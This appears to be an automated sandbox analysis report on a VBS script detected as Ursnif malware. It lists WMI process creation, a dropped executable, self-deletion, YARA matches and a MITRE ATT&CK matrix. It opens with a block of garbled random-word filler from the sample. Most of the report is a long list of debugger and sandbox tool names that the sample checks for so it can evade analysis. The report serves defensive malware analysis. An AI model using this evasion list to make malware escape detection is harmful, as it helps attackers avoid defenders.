tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332 NextIf ISsAHR ThenAYdtfwwDEnd If' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ogress.psd
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ogress.psd

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\j2trdiohfe7b.vbs
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXEH
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psd
            Source: C:\Windows\System32\wscript.exe TID: 1912 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: ogress.psd.0.dr | Binary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: ogress.psd.0.dr
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.237796755.0000021E5253C000.00000004.00000001.sdmp | Binary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.216478083.0000021E52550000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.217599547.0000021E5255F000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 121 | DLL Side-Loading 1 | Process Injection 1 | Masquerading 11 | OS Credential Dumping | Query Registry 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 4 | LSASS Memory | Security Software Discovery 141 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | Virtualization/Sandbox Evasion 4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 121 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | System Information Discovery 25 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

            Behavior Graph
